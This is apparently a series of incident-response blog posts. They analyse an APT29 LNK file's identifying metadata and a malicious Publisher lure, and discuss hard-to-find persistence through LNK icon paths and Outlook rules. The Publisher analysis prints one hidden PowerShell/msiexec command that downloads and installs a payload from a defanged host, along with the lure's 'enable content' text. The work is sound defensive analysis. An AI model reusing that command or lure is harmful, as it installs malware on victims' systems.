Saturday, December 29, 2018

Parsing the Cozy Bear LNK File

November 2018 saw a Cozy Bear/APT29 campaign, discussed in FireEye's blog post regarding APT29 activity (from 19 Nov 2018), as well as in this Yoroi blog regarding the Cozy Bear campaign (from 21 Nov 2018).  I found this particular campaign a bit fascinating, as it is another example of actors sending LNK files to their target victims, LNK files that had been created on a system other than the victim's.

However, one of the better (perhaps even the best) write-up regarding the LNK file deployed in this campaign is Oleg's description of his process for parsing that file.  His write-up is very comprehensive, so I won't steal any of his thunder by repeating it here.  Instead, I wanted to dig just a bit deeper into the LNK file structure itself.

Using my own parser, I extracted metadata from the LNK file structure for the "ds7002.lnk" file. The TrackerDataBlock includes much of the same information that Oleg uncovered, including the "machine ID", which is a 16-byte field containing the NetBIOS name of the system on which the LNK file was created:

Machine ID            : user-pc
New Droid ID Time     : Thu Oct  6 17:03:04 2016 UTC
New Droid ID Seq Num  : 13273
New Droid    Node ID  : 08:00:27:92:24:e5
Birth Droid ID Time   : Thu Oct  6 17:03:04 2016 UTC
Birth Droid ID Seq Num: 13273
Birth Droid Node ID   : 08:00:27:92:24:e5

From the TrackerDataBlock, we can also see one of the MAC addresses recognized by the system.  Using the OUI lookup tool from Wireshark, we see that the OUI for the displayed MAC address points to "PcsCompu PCS Computer Systems GmbH".  From WhatsMyIP, we get "Pcs Systemtechnik Gmbh".

Further, there's a SID located in the PropertyStoreDataBlock:

SID: S-1-5-21-1764276529-1526541935-4264456457-1000

Finally, there's the volume serial number embedded within the LNK file:

vol_sn             C4B2-BD1C

A combination of the volume serial number, maching ID, and the SID from the PropertyStoreDataBlock can be used to create a Yara rule, which can then be submitted as a retro-hunt on VirusTotal, in order to locate other examples of LNK files created on this system.

Note that the FireEye write-up mentions a previous campaign (described by Volexity) in which a similar LNK file was used.  In that case, MAC address, SID, and volume serial number were identical to the ones seen in the LNK file in the Nov 2018 campaign.  The file size was different, and the embedded PowerShell command was different, but the rest of the identifying metadata remained the same two years later.

Another aspect of the LNK file from the Nov 2018 campaign is the embedded PowerShell command.  As Oleg pointed out, the PowerShell command itself is encoded, as a base64 string.  Or perhaps more accurately, a "base" + 0x40 encoded string.  The manner by which commands are obfuscated can be very telling, and perhaps even used as a means for tracking the evolution of the use of the technique.

This leads to another interesting aspect of this file; rather than using an encoded PowerShell command to download the follow-on payload(s), those payloads are included encoded within the logical structure of the file itself.  The delivered LNK file is over 400K in size (the LNK file from 2016 was over 660K), which is quite unusual for such a file, particularly given that the LNK file structure itself ends at offset 0x0d94, making the LNK file 3476 bytes in size.

Oleg did a great job of walking through the collection, parsing and decoding/decryption of the embedded PDF and DLL files, as well as of writing up and sharing his process.  From a threat intel perspective, identifying information extracted from file metadata can be used to further the investigation and help build a clearer intel picture.

Addendum, 31 Dec: Here's a fascinating tweet thread regarding using DOSDate time stamps embedded in shellitems to identify "weaponization time" of the LNK file, and here's more of that conversation.

Friday, December 28, 2018

PUB File

Earlier this month, I saw a tweet that led me to this Trend Micro write-up regarding a spam campaign where the bad guys sent malicious MS Publisher .pub file attachments that downloaded an MSI file (using .pub files as lures has been seen before).  The write-up included a hash for the .pub file, which I was able to use to locate a copy of the file, so I could take a look at it myself.  MS Publisher files follow the OLE file format, so I wanted to take a shot at "peeling the onion" on this file, as it were.

Why would I bother doing this?  For one, I believe that there is a good bit of value that does unrealized when we don't look at artifacts like this, value that may not be immediately realized by a #DFIR analyst, but may be much more useful to an intel analyst.

I should note that the .pub file is detected by Windows Defender as Trojan:O97M/Bynoco.PA.

The first thing I did was run 'strings' against the file.  Below are some of the more interesting strings I was able to find in the file:


Document created using the application not related to Microsoft Office

For viewing/editing, perform the following steps:
Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.

"-executionpolicy bypass -noprofile -w hidden  -c & ""msiexec"" url1=gmail url2=com  /q /i http://homeofficepage[.]com/TabSvc"

Shceduled update task

One aspect of string searches in OLE format files that analysts need to keep in mind is that the file structure truly is one of a "file system within a file", as the structure includes sector tables that identify the sectors that comprise the various streams within the file.  What this means is that the streams themselves are not contiguous, and that strings contained in the file may possibly be separated across the sectors.  For example, it is possible that for the string "alabama" listed above, part of the string (i.e., "ala") may exist in one sector, and the remaining portion of the string may exist in another sector, so that searching for the full string may not find all instances of it.  Further, with the use of macros, the macros themselves are compressed, throwing another monkey wrench into string searches.

Back to the strings themselves; I'm sure that you can see why I saw these as interesting strings.  For example, note the misspelling of "Shceduled".  This may be something on which we can pivot in our analysis, locating instances of a scheduled task with that same misspelling within our infrastructure.  Interestingly enough, when I ran a Google search for "shceduled task", most of the responses I got were legitimate posts where the author had misspelled the word.  ;-)

The message to the user seen in the strings above looks similar to figure 2 found in this write-up regarding Sofacy, but searching a bit further, we find the exact message string being used in lures that end up deploying ransomware.

Next, I ran '' against the file; below is the output, trimmed for readability:

Root Entry  Date: 20.11.2018, 14:40:11  CLSID: 00021201-0000-0000-00C0-000000000046
    1 D..       0 20.11.2018, 14:40:11 \Objects
    2 D..       0 20.11.2018, 14:40:11 \Quill
    3 D..       0 20.11.2018, 14:40:11 \Escher
    4 D..       0 20.11.2018, 14:40:11 \VBA
    7 F..   10602                                \Contents
    8 F.T      94                                  \CompObj
    9 F.T   16384                                \SummaryInformation
   10 F.T     152                                \DocumentSummaryInformation
   11 D..       0 20.11.2018, 14:40:11 \VBA\VBA
   12 D..       0 20.11.2018, 14:40:11 \VBA\crysler
   18 F..     387                                 \VBA\crysler\f
   19 F..     340                                 \VBA\crysler\o
   20 F.T      97                                 \VBA\crysler\CompObj
   21 F..     439                                 \VBA\crysler\ VBFrame
   22 F..     777                                 \VBA\VBA\dir
   23 FM.    1431                              \VBA\VBA\crysler
   30 FM.    8799                              \VBA\VBA\ThisDocument
As you can see, there are a number of streams that include macros.  Also, from the output listed above, we can see that the file was likely created on 20 Nov 2018, which is something that can likely be used by intel analysts.

Using to extract the macros, we can see that they aren't obfuscated in any way.  In fact, the two visible macros are well-structured, and don't appear do much at all; the malicious functionality appears to embedded someplace else within the file itself.

Windows Artifacts and Threat Intel
I ran across a pretty fascinating tweet thread from Steve the other day.  In this thread, Steve talked about how he's used PDB paths to not just get some interesting information from malware, but to build out a profile of the malware author over a decade, and how he was able to pivot off of that information.  In the tweet thread, Steve provides some very interesting foundational information, as well as an example of how this information has been useful.  Unfortunately, it's in a tweet thread and not some more permanent format.

I still believe that something very similar can be done with LNK files sent by an adversary, as well as other "weaponized" documents.  This includes OLE-format Word and Publisher documents, as well.  Using similar techniques to what Steve employed, including Yara rules to conduct a VT retro-hunt, information can be built out using not just information collected from the individual files themselves, but information provided by VT, such as submission date, etc.

Wednesday, December 19, 2018

Hunting and Persistence

Sometimes when hunting, we need to dig a little deeper, particularly where the actor employs novel persistence mechanisms.  Persistence mechanisms that are activated by some means other than a system start or user login can be challenging for a hunter to root (pun intended) out.

During one particular hunting engagement, svchost.exe was seen communicating out to a known-bad IP address, and the hunters needed to find out a bit more about what might be the cause of that activity.  One suggestion was to determine the time frame or "temporal proximity" of the network activity to other significant events; specifically, determine whether something was causing svchost.exe to make these network connections, or find out if this activity was being observed "near" a system start. 

As it turned out, the hunters in that case had access to data that had been collected as part of the EDR installation process (i.e., collect data, install EDR agent), and were able to determine the true nature of the persistence.

Sometimes, persistence mechanisms aren't all that easy, nor straightforward to determine, particularly if the actor had established a foothold within the target infrastructure prior to instrumentation being put in place.  It is also difficult to determine persistence within an infrastructure when complete visibility has not been achieved, and there are "nexus systems" that do not have the benefit of instrumentation.  The actor may be seen interacting with instrumented systems, but those systems may be ancillary to their activity, rather than the portal systems to which they continually return.

One persistence mechanism that may be difficult to uncover is the use of the "icon filename" field within Windows shortcut/LNK files.  Depending upon where the LNK file is located on the system (i.e., not in the user's StartUp folder), the initiation of the malicious network connection may not be within temporal proximity of the user logging into the system, making it more difficult to determine the nature of the persistence.  So how does this persistence mechanism work?  Per Rapid7, when a user accesses the shortcut/LNK file, SMB and WebDav connections are initiated to the remote system.

Also, from here:

Echoing Stuxnet, the attackers manipulated LNK files (Windows shortcut files), to conduct malicious activities. In this case, they used LNK files to gather user credentials when the LNK file attempted to load its icon from a remote SMB server controlled by the attackers.

As you can see, this persistence method would then lead to the user's credentials being captured for cracking, meaning that the actor may be able return to the environment following a global password change. Be sure to check out this excellent post from Bohops that describes ways to collect credentials to be cracked.

Another persistent mechanism that may be difficult for hunters to suss out is the use of OutLook rules (description from MWR Labs, who also provide a command line tool for creating malicious OutLook rules, which includes a switch to display existing rules).  In short, an actor with valid credentials can access OWA and create an Outlook rule that, when the trigger email is received, can launch a PowerShell script to download and launch an executable, or open a reverse shell, or take just about any other action.  Again, this persistence mechanism is completely independent of remediation techniques, such as global password changes.

Additional Resources
MS recommendations to detect and remediate OutLook rules
Detecting OutLook rules WRT O365, from TechNet

Addendum, 21 Dec: FireEye blog post references SensePost's free tool for abusing Exchange servers and creating client-side mail rules.

Addendum, 24 Dec: Analysis of LNK file sent in the Cozy Bear campaign

Tuesday, December 18, 2018


Based on some testing that Phill had done, I recently updated my Recycle Bin index file ($I*, INFO2) parser.  Since then, there have been some other developments, and I wanted to document some additional updates.

We have seen recently that, apparently, as of Win10 1803 there have been changes made to the NTFSDisableLastAccessUpdate value in the Registry (David, Maxim).  In short, rather than the "yes" or "no" (i.e., "1" or "0") value data that we're used to seeing, there are a total of 4 options now.

I've updated the plugin accordingly.

Maxim shared some interesting insight into the SysCache.hve file recently.  This is a file whose structure follows that of Registry hive files (similar to the AmCache.hve file), and is apparently only found on Win7 systems.

There's some additional insight here (on Github) regarding the nature of the various values within some of the keys.

I created the plugin to parse this file, and to really make use of it, you need to also have the MFT from the system, as the SysCache.hve file does not record file names; rather, it records the MFT record number, which is a combination of the entry number and the sequence number for the file record within the MFT.

PowerShell Logging
As my background is in DFIR work and not system administration, it was only recently that I ran across PowerShell Transcription Logging. This is a capability that can be enabled via GPO, and as such, there are corresponding Registry values (in addition to the use of the Start-Transcript module, which can be deployed via PS profiles) that enable the capability.  There's also a Registry value that allows for timestamps to be recorded for each command.

This capability records what goes in with PowerShell during a session, and as such, can be pretty powerful stuff, particularly when combined with PowerShell logging.

To see what PowerShell transcription logging can provide to an analyst, take a look at this example, provided by FireEye, of a recorded Invoke-Mimikatz script session.  Here's an example (also from FireEye) of what the results of module logging looks like for the same session.

As these settings can inform an analyst as to what they can expect to find on a system, I created the plugin.  However, a dearth of available data has really limited my ability to test the plugin.

*Note: This post was originally authored on 9 Dec 2018